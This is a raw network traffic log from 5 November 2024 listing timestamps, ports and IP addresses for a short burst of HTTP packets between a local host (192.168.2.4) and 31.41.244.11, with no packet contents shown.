Nov 5, 2024 18:46:11.077399969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077409983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077413082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077419996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077425957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077433109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077464104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077555895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077567101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077578068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077588081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077599049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077604055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077611923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077626944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077626944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077653885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077861071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077872038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077883005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077893019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077898979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077904940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077917099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077922106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077922106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077928066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077939987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077943087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077950001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077963114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077969074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077969074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077972889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077984095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077994108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077996969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078006029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078016996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078022003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078022003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078042030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078058958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078077078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078279018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078288078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078295946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078306913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078319073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078326941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078330040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078335047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078341961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078355074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078365088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078368902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078368902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078377008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078387976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078398943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078401089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078401089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078430891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078443050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078448057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078448057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078454971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078464985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078471899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078483105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078483105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078495026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078501940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078505993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078519106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078526974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078531981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078538895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078541994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078553915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078564882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078572035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078583002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078607082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.078938961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078948975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078958988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078968048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078979969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.078984022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079042912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079042912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079083920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079094887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079106092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079116106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079124928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079128981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079134941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079135895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079147100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079158068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079165936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079168081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079181910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079191923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079191923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079196930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079205990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079214096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079214096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079225063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079230070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079236984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079241037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079246998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079251051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079261065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079266071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079272032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079276085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079289913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079293966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079294920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079299927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079305887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079305887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079317093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079329014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079329967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079355955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079370022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079920053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079931021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079941034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079956055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079967022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079973936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079977989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079988956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.079993963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.079998970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080009937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080013990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080019951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080030918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080032110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080051899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080069065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080280066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080290079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080301046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080311060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080315113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080322027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080332041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080338001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080346107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080352068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080357075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080365896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080368996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080379009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080389977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080390930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080399990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080410957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080420017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080420971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080437899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080437899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080451965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080462933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080461979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080476999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080477953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080490112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080499887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080499887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080513000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080523968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080534935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080538034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080543041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080545902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080557108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080569029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080570936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080575943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080580950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080590963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080600023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080602884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080611944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080631018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080631971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080642939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080643892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.080665112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080691099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.080984116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081033945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081212044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081223965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081229925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081239939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081249952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081260920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081262112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081271887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081281900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081285954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081293106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081305027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081306934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081315994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081326962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081330061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081338882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081348896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081355095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081360102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081378937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081382036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081389904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081402063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081403971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081413031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081423998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081425905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081434011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081444979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081446886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081454992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081466913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081469059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081478119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081489086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081501007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081507921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081511021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081521988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081527948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081535101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081542969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081546068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081559896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081564903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081569910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.081588984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.081624031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082005978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082019091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082029104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082052946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082071066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082175970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082191944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082211018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082221031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082225084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082232952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082243919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082252979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082254887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082267046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082268953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082278013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082288980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082292080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082298994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082309008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082317114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082319975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082329988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082340002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082345009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082350969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082360983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082361937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082371950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082382917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082386017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082395077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082407951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082408905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082417965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082425117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082449913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082638979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082652092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082690001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082796097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082814932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082825899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082837105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082844019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082853079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082864046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082871914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082875013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082885027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082887888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082895994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082906008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082907915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082917929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082922935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082928896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082938910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082945108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082950115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082959890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082971096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082973003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082982063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.082998991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.082998991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.083004951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.083010912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.083030939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.083050013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.104875088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.104959965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.105051041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.105060101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.105189085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.148022890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.148046970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.148056030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.148073912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.148087978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154315948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154326916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154336929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154381037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154390097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154462099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154473066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154483080 CET	80	49804	31.41.244.11	192.168.2.4
